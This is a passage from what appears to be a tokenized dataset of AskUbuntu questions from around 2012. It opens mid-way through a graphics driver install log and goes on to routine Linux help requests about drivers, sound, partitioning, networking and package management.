) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalcl.so because associated file /usr/lib32/fglrx/libaticalcl.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalrt.so because associated file /usr/lib32/fglrx/libaticalrt.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : forcing reinstallation of alternative /usr/lib/fglrx/ld.so.conf because link group i386-linux-gnu_gl_conf is broken . update-alternatives : warning : skip creation of /etc/opencl/vendors/amdocl64.icd because associated file /usr/lib/fglrx/etc/opencl/vendors/amdocl64.icd ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalcl.so because associated file /usr/lib32/fglrx/libaticalcl.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalrt.so because associated file /usr/lib32/fglrx/libaticalrt.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : using /usr/lib/fglrx/alt_ld.so.conf to provide /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf ( x86_64-linux-gnu_gl_conf ) in auto mode . update-initramfs : deferring update ( trigger activated ) loading new fglrx-updates-8.960 dkms files ... building only for 3.2.0-27-generic-pae building for architecture i686 building initial module for 3.2.0-27-generic-pae done . fglrx_updates : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.2.0-27-generic-pae/updates/dkms/ depmod ... . dkms : install completed . update-initramfs : deferring update ( trigger activated ) processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... setting up fglrx-amdcccle-updates ( 2:8.960-0ubuntu1 ) ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-27-generic-pae processing triggers for libc-bin ... ldconfig deferred processing now taking place 2012-08-07 20:47:00,427 warning : /sys/module/fglrx_updates/drivers does not exist , can not rebind fglrx_updates driver 2012-08-07 20:47:15,595 debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf 2012-08-07 20:47:15,595 debug : fglrx_updates is not the alternative in use 2012-08-07 20:47:15,608 debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf 2012-08-07 20:47:15,608 debug : fglrx_updates is not the alternative in use when i restart , i find the original fglrx is uninstalled , but i can reinstall fine . i have been using just the original ( no updates ) just fine . however , i have been experiencing the same chrome lag as this question . is it related to my driver ?
173261	ca n't un-mute toshiba a-305 s6916	the toshiba satellite a-305 s6916 laptop has six semi-touch buttons above the keyboard . the 'buttons ' are capacitative touch areas which toggle on and off . they are back-lit when on , dark when off . the buttons are audio controls -- mute , media , play , stop , back and next . when i touch the 'mute ' button to disable it , it goes off for about half a second , then comes back on . there is also a volume dial on the front of the laptop . when i scroll the dial , i see the software volume slider supposedly moving the volume up and down , but i get no sound . if i start rhythmbox and change the volume using the slider on the front of the laptop , rhythmbox locks up . i 've hard booted the laptop ; that did n't help . i 've had the laptop for a couple of years , and i 've never had trouble with the sound before . i 'm not exactly sure when the problem started , i do n't do a whole lot that involves audio . ┌───────────────────────────── alsamixer v1.0.22 ──────────────────────────────┐ │ card : hda intel f1 : help │ │ chip : realtek alc268 f2 : system information │ │ view : f3 : [ playback ] f4 : capture f5 : all f6 : select sound card │ │ item : master [ db gain : 0.00 ] esc : exit │ │ │ │ ┌──┐ ┌──┐ ┌──┐ ┌──┐ ┌──┐ ┌──┐ │ │ │▒▒│ │▒▒│ │▒▒│ │ │ │▒▒│ │ │ │ │ │▒▒│ │▒▒│ │▒▒│ │ │ │▒▒│ │ │ │ │ │▒▒│ │▒▒│ │▒▒│ │ │ │▒▒│ │ │ > │ │▒▒│ │▒▒│ │▒▒│ │ │ │▒▒│ │ │ > │ │▒▒│ │▒▒│ │▒▒│ │ │ │▒▒│ │ │ > │ │▒▒│ │▒▒│ │▒▒│ │ │ │▒▒│ │ │ > │ │▒▒│ │▒▒│ │▒▒│ │ │ │▒▒│ │ │ > │ │▒▒│ │▒▒│ │▒▒│ │ │ │▒▒│ │ │ > │ │▒▒│ │▒▒│ │▒▒│ │ │ │▒▒│ │ │ > │ │▒▒│ │▒▒│ │▒▒│ │ │ │▒▒│ │ │ │ │ │▒▒│ │▒▒│ │▒▒│ │ │ │▒▒│ │ │ │ │ ├──┤ ├──┤ ├──┤ └──┘ └──┘ └──┘ ┌──┐ ┌──┐ │ │ │mm│ │mm│ │mm│ │oo│ │oo│ │ │ └──┘ └──┘ └──┘ └──┘ └──┘ │ │ 100 100 < > 100 100 < > 100 0 < > 0 100 < > 100 0 < > 0 │ │ < master > headphon speaker pcm front mi mic boos s/pdif s/pdif d │ └──────────────────────────────────────────────────────────────────────────────┘ i turned up the master and speaker volume in alsamixer , but that did n't help ... the mute button is still enabled . i also verified that the youtube video that i was watching actually did have audio ; - ) this issue is similar to sound muted in milliseconds after unmute , although i ca n't even hear 100ms worth of sound , even when i do hit the unmute button . i do see the light turn off and on again though . i also tried plugging in earphones ; that did n't help .
173263	disk management problem ( in windows ) creating space to install ubuntu	i tried to do a second partition on my pc and now on the disk management is saying that is in simple volume . i want to change it back to normal ( with the blue color ) . i was trying to do the second partition because i want to install ubuntu on it . now i do n't know how to get the disk management back to normal , and the color of my c : , e : , and e : are yellow . i read on a forum that if my disk is dynamic i can not boot into windows 7 again after installing ubuntu . i am scared things may already be broken in this way -- what do i do now ?
173264	how can i make ubuntu quiet for an autistic teen ?	my autistic son uses an ubuntu computer to surf the web , watch videos and listen to music . he watches some videos and turns them too loud all night . i wrote a script which turns down the volume periodically using the amixer command . i then added this to the start-up applications , but he found that and disabled the scripts and reboot the machine . then i tried calling it in rc.local but can not get this script which should run forever to work there . also i could not get it to work in /etc/rc3.d either . maybe it is the script , but i can not seem to get this to work , and there does not seem to be a way to lower the maximum sound output limit . unless there is a way to remove the `` start-up applications '' from the gear menu , i have to go the hidden script route . any help would be greatly appreciated .
173265	how come asus sells ubuntu installed 1225cs , when we dont have drivers for gma3600 ?	i recently purchased a asus 1225c cedar trail netbook . it did n't come preinstalled with ubuntu like it comes in some markets . i installed ubuntu 12.04 lts on it . while ubuntu works just fine , i am bothered by the lack of proper graphics support because of intel gma 3600 . i am aware that this is not a problem of ubuntu . my question is this : how does asus manage to sell these netbooks in other markets with ubuntu preinstalled ? how does asus manage to get everything to work ? and if they can , why are n't i able to do the same ? link : for more on asus 1225c as you can see , they show ubuntu working perfectly in the screenshots . is this false advertising ?
173268	hdmi sound output dissapearing after first use	i have a media centre with a ati radeon hd graphics card using ubuntu desktop with all updates current which works fine for video and will also work perfectly for sound . the problem is that it seems after the first time using the media centre to play something the next time i come back to use it the hdmi output device is missing within the sound devices list ( it 's always there and not being used when i turn on the media centre for the first time ) . a reboot remedies this and i can then play a film or music through the tv ( which is hooked up to the sound system ) . i appreciate there are other solutions hardware related such as using aux or digital audio cables but the hdmi cable sound output `` works '' and i want a software solution to what seems to be a driver related issue . this is n't program specific i have tried numerous different video and audio players using multiple file types and the hdmi sound output dissapears every time i next use it . let me know if more info is needed !
173271	how to set up a notification for `` new in repository '' packages ?	i want to see a list of `` new in repository '' packages every time they appear after cache update . how can i achieve this ? related questions : how exactly does synaptic and aptitude keep track of `` new in repository '' packages ? is there an rss feed that alerts subscribers of new/updated packages in the official repositories ?
173273	ca n't see any startup choices when i start-up the laptop	i try to install ubuntu 12.04 in different partition . after completion of my ubuntu installation . my laptop restart but i ca n't see any boot loader or start up choose what os i want to choose ( windows or ubuntu ) . after this i ca n't run my window 7 also , one blink _ sign appears on my blank black screen . so what can i do for run windows or ubuntu . after this again i try to install complete ubuntu via usb flash disk . but i have 400gb hard disk , in one drive /dev/sda4/ but have 3 partition in window after ubuntu installation c d e. how to recover my windows7 .
173280	how do i completely uninstall ubuntu 12.04	i need to uninstall ubuntu 12.04 . when i installed it , i installed it alongside windows , and with a usb boot drive . i recently uninstalled windows completely because it was causing an issue . i wish to re install the same version of ubuntu after this . i really want to do a total clean install . i do n't need any files on here , i never saved anything important anyways . so how should i go about totally removing everything and starting fresh with ubuntu 12.04 ? thanks .
173292	permissions to access an encrypted external hdd	i have an external hdd which has an encrypted ext4 filesystem . when i plug it into one of my laptops and provide the encryption password , i get this popup box saying : you do not have permissions necessary to view the contents of label when i connect it to my other laptop things are fine and i can access the drive contents . why is this and how can i fix it ?
173296	ca n't open video files	i could open video files but then i installed ffmpeg to install opencv and now it does not open video files . i tried vlc and ubuntu 's movie player to open .mkv , .avi , and .mp4 but none of them opened . when i try opening them from the command line with vlc i get this : [ 0x2145070 ] mkv demux error : can not load some cues/chapters/tags etc . ( broken seekhead or file ) [ 0x2145070 ] mkv demux error : can not load some cues/chapters/tags etc . ( broken seekhead or file ) segmentation fault i have ubuntu 11.10 64bit . i used this guide to install ffmpeg . when configuring x264 and ffmpeg i enabled shared and fpic . can anyone help me ?
173299	how to remove unity and the default desktop environment of ubuntu	i have installed lxde from ubuntu software center , ( did n't install the addons i.e . chromium , gui login manager , lxtask ) . now while logging in i have options allowing me to choose between lxde and unity 3d and 2d , gnome . so how do i remove all those other desktop environments and keep lxde just like in lubuntu , but i want to keep my installed programs . i 'm using 12.04lts .
173300	stuck at boot screen : checking file system stage	i cant login to ubuntu . the splash screen stuck after checking file system . i used `` storage device manager '' ( pysdm ) to mount drives at boot time and also changed some options in it ( which i ca n't remember now ) . since then ubuntu ( 12.04 ) is not starting .
173303	sed removes newline at eof	i 've tried using sed to replace an select with belect in a file : sed 's/select/belect/g ' add_pixel.sql | diff - add_pixel.sql gives me : 22c22 < belect max ( id ) into max_id from pixels ; -- - > select max ( id ) into max_id from pixels ; 36c36 < ' ( belect id from pixels where pixel_id= '' ' , new_pixel_id , -- - > ' ( select id from pixels where pixel_id= '' ' , new_pixel_id , 47c47 < delimiter ; -- - > delimiter ; \ no newline at end of file this was confirmed by wc - the fiel after sed is one line shorter than the original . why did sed 's 's/select/belect/g ' removed the newline from the last line of the file ?
173304	gm3u app needs libgnomeui.so.32 - how do i install it ?	i have an music app that reports the following when i run it gm3u : error while loading shared libraries : libgnomeui.so.32 : can not open shared object file : no such file or directory i ca n't seem to find what package will install this library .
173307	root file not defined installing from vm	i installed an oracle vm on my machine and when i loaded an ubuntu iso it gave me options of trying ubuntu or installing ubuntu my first issue is i want to install on another partition i have made not my c , when i tried installing it gave options of side-by-side or the entire disk i want side by side but if i asked to installed i get this error : no root file system defined please correct this from the partitioning menu . please it important that i do n't want to install on my c drive . ( the partition 's file system is ntfs in case its important )
173317	how to determine which wifi technology is currently used in connection ?	i would like to check which 'technology ' ( a/b/g/n ) is currently used by my wifi card for the connection and to check which standards it can use . how can i check that ? edit alright , i have tried sudo lshw -class network and i got from that : *-network description : wireless interface product : ar9287 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : xx : xx : xx : xx : xx : xx width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-27-generic firmware=n/a ip=192.168.1.108 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : b5100000-b510ffff so i can get form that my card 's 'possibilities ' wireless=ieee 802.11bgn but how can i get information about current connection ?
173321	stuck between tty1 and disconnected from plymouth	i am running 12.04 with an hd7970 . i installed fglrx from amd and it worked okay . then ubuntu prompted me to install updates ( from software-center ) . after doing this , the pc only boots to a black screen called chips tty1 . if i go to the recovery mode , all the options give me a blinking cursor ( after a confirmation dialog ) , but when i press ctrl+alt+del then they react ( repair , gfx safe ) and shortly after it reboots . if i choose the normal boot , i get an orange '' mountall : plymouth disconnected '' .
173322	workflow for working on www-data owned files	what is the best workflow for working on php webpages ( local ) in `` ubuntu desktop '' . my problem is , when i login with my ubuntu account , and when i open a php file `` geany '' i can not save the file any more , because the file is owned by `` www-data '' . is there a way to open `` www-data '' owned files - > edit it - > and save them again as www-data ? what is your workflow ?
173323	how do i detect and remove python packages installed via pip ?	i have accidently installed python packages to my system using pip instead of apt-get . i did this in two ways : using an older version of virtualenv , i forgot to append -- no-site-packages when creating the virtualenv - after that when i called pip install , the python packages where installed to the system rather than the virtualenv in a correctly setup virtualenv , i typed sudo pip install somepackage - the sudo installed to the system rather than the virtualenv i happened to notice this because i typed pip freeze outside a virtualenv , and spotted some python packages listed that should n't be there . so now my question is : how do i identify all python packages that have been erroneously installed on the system ( that is , python packages that appear in the pip freeze list , but were not installed with apt-get ) ? how do i remove them ?
173329	what alternatives are available to replace the purple boot splash screen ?	the reason for this is i would love a animated splash screen , just for a bit of eye candy to replace the purple splash ( with 4 dots ) duringthe boot sequence . i know it will slow down boot time but i do n't care i just want it to look good . when i show my friends how much better looking ubuntu is than windows the splash really lets it down . any one know a good alternative to the existing plymouth boot ? i could not get mine to change the splash screen ( with terminal or gui apps ) , and it is now broken , it just shows a load of error messages at boot but still starts ubuntu .
173334	problem burning iso file to disc	i am using sony cd-r 700 mb discs and every time i try to burn the iso file on a disc , an error message pops up saying error while burning , drive is busy . can anyone assist me in this process ? i am trying to do this on my hp touchsmart which has one disc drive .
173335	brightness control on sony vaio vpcy2 not working	i have a sony vaio vpcy2 and the brightness control is not working . i tried the solution on brightness controls not working on a sony vaio vpcy2 but it did not work for me . can someone help me out with another solution ?
173336	control or input problems in games	i have somes problems with some games in ubuntu 12.04 64 bit , both in wine and with native games in that i ca n't control the characters since they always move forward or in circles . that happens in grand theft auto : san andreas , but also in the native linux games psychonauts and shank making the games unplayable ( so it 's not a problem with wine , i guess ) . does anyone know what 's happening ? is there a possible fix ?
173337	where i can look for reason of laptop freeze ?	during verification dvd via cdck my laptop froze twice , with unresponsive keyboard and mouse . before freezing , the screen turns blue ( first time ) and black ( second time ) . the log /var/log/syslog says nothing about it . ubuntu 12.04 works on laptop ( dell latitude e6510 ) with the latest updates . i would like to be 'prepare ' for a next time when the laptop freezes again .
173342	is swift object storage a requirement ?	we 're in the process of deploying a private openstack instance but do n't have the swift object storage service available yet . can juju bootstrap launch a utility instance without swift ? i see that the openstack configuration control-bucket is a container id .
173346	do i need to do anything after upgrading my ram from 2gb tp 4gb ( 2x2gb )	i got a new 2gb ram and i am going to add it along with my existing 2gb card making it 2x2gb=4gb ram . do i have to do anything extra to make it work as 4gb fully ? anything to do with the pae kernel stuff ? ? ( i already have a pae kernel ) coz i have been through something like 4gb/4gb+ ram needs pae kernel .
173351	how to open port 21 ?	i installed vsftpd in my linux server 12.04 . unfortunately my firewall closed port 20 and 21 . so i used the commands found here and other commands to open my ports . but i tested with nmap and i saw ports did n't open . what can i do ? i need to open these ports .
173364	installing ubuntu 12.04 on a usb stick	i have a company laptop that i am allowed to use for personal things . i want to run ubuntu on it , but i 'd rather not mess with the existing partitions or boot setup . i have bought a kingston datatraveler hyperx 128gb usb stick with the goal of running a full ubuntu installation from this stick . not a live cd , not a live cd with persistance , an actual real full installation . should i just go ahead running the ubuntu installer from cd and installing to my usb stick as if it were a hard disk ? can i just write a bootloader to the usb stick and boot from the stick through the bios boot menu ? are there other things i should remember to take care of ? i am planning to run tmp from a tmpfs ramdisk to ease down on the writes ( is this still an issue with modern usb sticks ? ) i am not sure what i will do with the swap partition yet - the system has 4gb of ram so i 'm considering running without a swap partition . i welcome your input and i hope this question was not posted in the wrong place .
173372	can not open a live cd made using infrarecorder	i tried to burn the ubuntu iso file onto a cd using infrarecorder and i followed the instructions at how to burn a cd on windows . when it was finished , i inserted the cd again to check if it had burned properly . but i could n't open the cd or do anything with it and the bar indicating how much space was used was gone . is this normal ?
173373	wubi installation completed but getting error msgs after booting for the first time	i installed ubuntu using wubi on windows 7 system at my office laptop . the office laptop has a pgp encryption application running . after installation , when i boot into the 12.04 installation automatically for the first boot , i get the following error message : could not find the iso /ubuntu/install/installation.iso , on an initramfs . i booted back windows 7 and checked c : /ubuntu/install/installation.iso it was a 711mb iso image and i extracted the iso and found out that all the files were the files which i had on the iso image i had downloaded from the ubuntu website . i mean basically the same folder structure and the contents were the same and i was able to extract the iso which means that the iso file is not broken or erroneous . the laptop does not have a cdrom so in the initramfs , i tried mounting the pendrive which was the ubuntu installation disk created by universal usb installer.exe but i was unable to mount the /dev/sda1 or /dev/sda2 , i have a single hard disk partition and i assumed the pen drive would be either of the above . i did n't find an /dev/sdb parition anywhere . is there any way of bringing up the boot process by eliminating the error by mounting some disk which contains the same folder structure which wubi installed on the hard drive c : /ubuntu in my case or mounting the pen drive which i converted as an installation media . i need help on installing the ubuntu by eliminating the errors . please help me with the installation as soon as possible .
173374	what is the easiest way to exhaustively test the proxy support of my application ?	i 'm posting this on askubuntu because `` easiest '' in my case includes giving preference to solutions depending only on software available in the default ubuntu repositories . ( to be more accurate , 12.04 ) i am currently developing an application that accesses web apis and would like to test whether proxy support is working . ideally , i would like to run a local server and simply tell my application to access the proxy in localhost . the catch is that my application supports socks4 , socks5 , and http proxies , and i would like to test all possible error cases . this means : sending a socks5/http request to a socks4 server must not work sending a socks4/http request to a socks5 server must not work sending a socks5/socks5 request to a http server must not work ( all cases both with and without authentication ) so i ca n't use ssh -d for socks , for example , because it automagically accepts both socks4 and soccks5 connections .
173376	how do i disable joystick input ?	the file /dev/input/js0 related to joysticks is giving me some problems in games . i just renamed the file and everything went to normal . so , how do i disable joystick input ? i am using ubuntu 12.04 .
173378	can i split the upgrade downloads into multiple parts ?	i 'm using internet through mobile phone , can i upgrade ubuntu the latest version by 2 or 3 parts ? because connection is very slow . my current version ubuntu 10.10 . how can i split the downloads into multiple parts ?
173380	how to use a driver for ubuntu with a higher kernel version ( 2.6.36 ) on ubuntu with lower kernel version ( 2.6.30 ) )	i want to use easycap on my ubuntu ( kernel version 2.6.30 ) . the problem is that , the drivers for easycap are included in kernel version 2.6.36 and higher . i have extracted all the files corresponding to easycap driver from linux-2.6.36/drivers/staging/easycap . and now i am stuck as while trying to make it it simply says make : no targets . stop i could have understood if it showed that its not getting header files . any one having any idea how to do this , or how could i use easycap . any help will be appreciated .
173385	enforce file permissions	i have a directory where many users have write access and often the permissions on the directory changes . is there a tool that lets me monitor the files for changes and enforce a specific file permission or any other way i can enforce this when users have write permission .
173386	problem with the logitec orbicam webcam : how to troubleshoot it ?	my webcam is working/not working rather curiously under ubuntu 12.04 , and i 'd like some help in troubleshooting it . it 's a logitech orbicam , integrated within my acer aspire 5633wlmi laptop . with lsusb it is identified as : bus 001 device 002 : id 046d:0896 logitech , inc. orbicam luckily , it works correctly when doing a google hangout from chrome . but the strange thing is that the capture through adobe flash ( e.g . omegle , chatroulette ) does not work : the cam is not detected . skype for linux does not detect it . cheese crashes on startup ( see the bug report ) . what could i do to troubleshoot and fix the problem ? there must be a way to make it work under skype/cheese and the other websites . i remember using it some years ago ( older versions of ubuntu and skype ) and it worked perfectly . update : if i run skype with either ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so skype ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l2convert.so skype i get the following in /var/kern.log aug 15 14:41:57 maggie kernel : [ 653.296753 ] usb 1-4 : usb disconnect , device number 7 aug 15 14:41:57 maggie kernel : [ 653.328056 ] gspca_vc032x : reg_w err -19 aug 15 14:41:59 maggie kernel : [ 655.140094 ] usb 1-4 : new high-speed usb device number 8 using ehci_hcd aug 15 14:41:59 maggie kernel : [ 655.315878 ] gspca_main : vc032x-2.14.0 probing 046d:0896
173393	why ca n't i compile this version of postfix ?	i just installed postfix 2.7.11 in ubuntu server from source code . i do not use the ubuntu own one because i need the old version . i found a very interesting problem . before , in both centos 5 and 6 , i can build the source code without any problem . but , in ubuntu server 12.04 is totally different . i got the following problems : dict_nis.c:173 : error : undefined reference to 'yp_match' dict_nis.c:187 : error : undefined reference to 'yp_match' dns_lookup.c:347 : error : undefined reference to '__dn_expand' dns_lookup.c:218 : error : undefined reference to '__res_search' dns_lookup.c:287 : error : undefined reference to '__dn_expand' dns_lookup.c:498 : error : undefined reference to '__dn_expand' dns_lookup.c:383 : error : undefined reference to '__dn_expand' yes , this reason is obviously . i just search related library and add it to the makefile . it works . the question is why ? what is the difference between ubuntu server and centos ? one possibility is gcc and ld version . ubuntu server use different version of gcc and ld with centos . but i am not sure .
173394	ubuntu one does n't log in on windows	i love using ubuntu . however i have a windows xp desktop at work . i work alot between home and the office . it would be great not to have to use dropbox instead of u1 to sync my work . u1 installs fine but whenever i try log in i get this error : i checked with the it department and there are no proxies . so i have no idea why it does this nor how to fix it . please help ?
173398	restricted-manager should show driver-version	i think that the restricted-manager should show the driver-version . for example : i have installed the current ati-catalyst-driver 12.6 from the ati-website and i want to check if ubuntu has this driver in their repository . i ca n't do this . i think it is important to show this information . maybe sombody will fix it ? i hope this is the right place to talk about something like that . i found nothing else where i can share my idea . ( sorry for this bad english ; - ) )
173401	dynamic document template	i would like to create a `` c++ class '' document template , i know you can make static ones by putting them into ~/templates , but i would like to be able for the content to change according to the file name on creation , for example , using a template like such ( pseudocode ) : # ifndef $ ( filename ) _hpp_included # define $ ( filename ) _hpp_included class $ ( filename ) { public : } # endif $ ( filename ) _hpp_included is this possible ? if so , how can i do it ? thanks in advance , ell .
173403	lost option to use kde after an update - how to bring it back without losing configuration	after running an update on monday , on a kubuntu 12.04 box , i 've lost the option to select kde in the login screen ( there was a message that read approximately `` option kde* has been removed '' ) . only `` default '' and `` failsafe '' remained . using `` default '' resulted in a black screen with only the kde-style mouse cursor visible , using `` failsafe '' brought me back to the login screen . in the meantime , i 've installed unity ( and gdm along with it ) . i then attempted sudo dpkg -- reconfigure kdm but that only brought back the kde login screen ( with additional gnome/unity session options ) . it looks like either some kde package got uninstalled , or some configuration has been corrupted . regarding the former : $ dpkg -- get-selections | grep kde apport-kde install apturl-kde install firefox-kde-support install gdebi-kde install jockey-kde install kde-baseapps-bin install kde-baseapps-data install kde-config-gtk install kde-config-touchpad install kde-runtime install kde-runtime-data install kde-style-oxygen install kde-wallpapers-default install kde-window-manager install kde-window-manager-common install kde-workspace-bin deinstall kde-workspace-data install kde-workspace-kgreet-plugins install kde-zeroconf install kdebase-bin install kdebase-runtime install kdebase-runtime-data deinstall kdebase-workspace-bin deinstall kdebase-workspace-data deinstall kdegames-card-data install kdegraphics-libs-data install kdegraphics-mobipocket install kdegraphics-strigi-analyzer install kdegraphics-strigi-plugins install kdegraphics-thumbnailers install kdelibs-bin install kdelibs5-data install kdelibs5-plugins install kdemultimedia-kio-plugins install kdenetwork-filesharing install kdepasswd install kdepim-groupware deinstall kdepim-kresources install kdepim-runtime install kdepim-strigi-plugins install kdepimlibs-kio-plugins install kdesudo install kdewallpapers install language-pack-kde-en install language-pack-kde-en-base install language-selector-kde install libakonadi-kde4 install libdebconf-kde0 install libkde3support4 install libkdeclarative5 install libkdecorations4 install libkdecore5 install libkdegames5 deinstall libkdegames5a install libkdepim4 install libkdepimdbusinterfaces4 install libkdesu5 install libkdeui5 install libkdewebkit5 install libreoffice-kde install polkit-kde-1 install python-kde4 install software-properties-kde install system-config-printer-kde install update-manager-kde install usb-creator-kde install xsettings-kde install i think some packages may be missing , but i 'm not sure , and i do n't want to experiment in fear of losing my kde-specific configuration and/or making things worse . in that vein : how can i restore the kde option on login without losing my configuration ?
173411	netbeans 7.2 suddenly has cpu spikes and slows down completely	when i first installed netbeans 7.2 everything was pretty smooth . but for the past couple of days i 've noticed that after a few hours of usage the cpu usage begins to spike to unbearable levels . forcing me to restart the application . here is a screenshot : i have n't installed anything besides package manager updates , which i guess should be the first place to look . but i was hoping someone might also have seen this issue and would know what i should look into .
173414	mounting a disk produces two icons on the launcher	ubuntu 12.10 : when mounting a disk ( either ntfs partition or inserting a cd/dvd ) , two icons appear on the launcher for each particular disk ; both of them seem to be identical and work in the same way . is it a bug or a feature ? if possible , i would like to leave just one shortcut per disk . ( it is interesting that for usb flash drives only one icon appears ) .
173417	chatting with empathy	i 'd like to chat in some irc-channels hostet at freenode and i do n't really know how . how do i create an account , how do i use it with empathy ?
173418	how to get rid of buggy intellij idea dialog that wo n't go away ?	this is a bug i run into every couple of days , with intellij idea 's `` go to class ... '' ( or `` go to file ... '' ) dialog . usually it closes normally ( when a class is selected or esc pressed ) , but sometimes the popup is left behind , in the middle of the screen , on top of everything else . even when i quit ( or kill ) idea completely , it stays . example of what it looks like : only way i 've found to get rid of it is logging out completely and then back in ( i.e . restart x / gnome ) . but having to do that is very annoying , as it can take 10 minutes or whatever to save ( and re-setup afterwards ) everything i have open . is there any other way to get rid of the buggy popup dialog , while remaining logged in ? ( such as restarting some gnome or x service / process . ) using ubuntu 11.04 and gnome ( not unity ) . intellij idea ultimate edition 10.5 , running on sun 's jdk 1.6.0_26 ( i.e . sun-java6-jdk version 6.26-2natty1 ) some info about the graphics driver : $ jockey-text -l xorg : fglrx - ati/amd proprietary fglrx graphics driver ( proprietary , disabled , not in use ) and : $ sudo lshw -c video *-display description : vga compatible controller product : rv730 pro [ radeon hd 4650 ] vendor : ati technologies inc physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:47 memory : e0000000-efffffff memory : f0100000-f010ffff ioport:1100 ( size=256 ) memory : f0120000-f013ffff
173419	how do i activate my bluetooth adapter ?	the bluetooth adapter on my dell inspiron 1525 is not present this what i have tried : sudo apt-get remove bcmwl-kernel-source but i get the message there is no such package ... how do i activate it ?
173432	how do i remove rootkits ?	to my understanding , rootkits on linux infect the kernel to get root privileges and there are many scanners ( i use rkhunter ) to scan for rootkits in the kernel , but i have yet to find a program that would remove rootkits . how would i remove a rootkit in linux ? would i have to download the same kernel and replace the infected files ? what is the best way to go about doing this ?
173433	how do i get a canon multipass mp390 working ?	setting up a computer for a college student . have this canon multipass mp390 printer/scanner/copier with the canon cd . will not load into ubuntu 11.10 . trying to print comes up empty . went to canon 's web site and they have no driver for linux for this printer .
173439	is there a way to switch to tree view in nautilus 3.5 ?	is there a way to switch to tree view in nautilus in ubuntu 12.10 ? i tried gsettings set org.gnome.nautilus.window-state side-pane-view `` tree '' , but received a response no such key 'side-pane-view ' . did it become obsolete or i 'm just doing something wrong ?
173441	how to change trust settings in unity-webapps	i installed unity-webapps and i allowed gmail to integrate , however disallowed access to google docs and something else . now i want to review and change the settings . how to do that ? i found how to remove single integrations , but i never get the configuration dialog back where i confirmed , what to allow and what not .
173443	how do i remove default `` places '' in nautilus 3.5 ?	is there a way to remove default `` places '' ( like documents , music , pictures etc ) in nautilus in ubuntu 12.10 ? option `` remove '' in nautilus context menu is greyed out for these places -- so i can remove the folder itself , but i can not remove from 'places ' the shortcut to it . i have also tried commenting out appropriate lines in the ~/.config/user-dirs.dirs file , but it seems to be of no effect either .
173444	ca n't start isc dhcp ipv6 server	trying to enable the isc dhcp server for just ipv6 on ubuntu 12.04 lts . i have downloaded and installed the dhcp server via the following command : $ sudo apt-get install isc-dhcp-server then i have followed the instructions in the following resources , ubuntu wiki dhcpv6 , sixxs - configuring isc dhcpv6 server and linux ipv6 howto - configuration of the isc dhcp server for ipv6 . so from review all those resources it seems like i need to : set a static ipv6 address for the interface i want to run the dhcpv6 server from that is part of the ipv6 network subnet outside the dhcp range . edit the /etc/dhcp/dhcpd6.conf file to configure the dhcpv6 range etc . create the /var/lib/dhcp/dhcpd6.leases manually start the dhcpv6 server . setting the static ip for eth0 $ sudo ifconfig eth0 inet6 add 2001 : db8:0:1 : :128/64 my dhcpd6.conf default-lease-time 600 ; max-lease-time 7200 ; log-facility local7 ; subnet6 2001 : db8:0:1 : :/64 { # range for clients range6 2001 : db8:0:1 : :129 2001 : db8:0:1 : :254 ; } created the dhcpd6.leases file as indicated in the dhcpd.leases man page . $ touch /var/lib/dhcp/dhcpd6.leases # tried with sudo as well manually starting the dhcpv6 server . attempted to start the server using the following command : $ sudo dhcp -6 -f -cf /etc/dhcp/dhcpd6.conf eth0 the problem , the dhcp will not start , with an append error for the dhcpd6.leases file as indicated below when running the manual start command noted above . ca n't open /var/lib/dhcp/dhcpd6.leases for append . any ideas what i might be missing ?
173448	wireless connected but internet not working , modem is fine because i 'm typing over wifi on my android	i ca n't connect to the internet in 11.10 . i tried switching my wifi card to another usb slot but nothing changed . is it possible that the card is able to connect while not being able to receive packages ? $ ifconfig eth0 link encap : ethernet hwaddr 40:61:86:35:11 : b0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:43 base address:0x6000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr 74 : ea:3a:8c : d5:5c inet addr:192.168.2.5 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :76ea:3aff : fe8c : d55c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:12 errors:0 dropped:0 overruns:0 frame:0 tx packets:102 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1209 ( 1.2 kb ) tx bytes:15329 ( 15.3 kb )
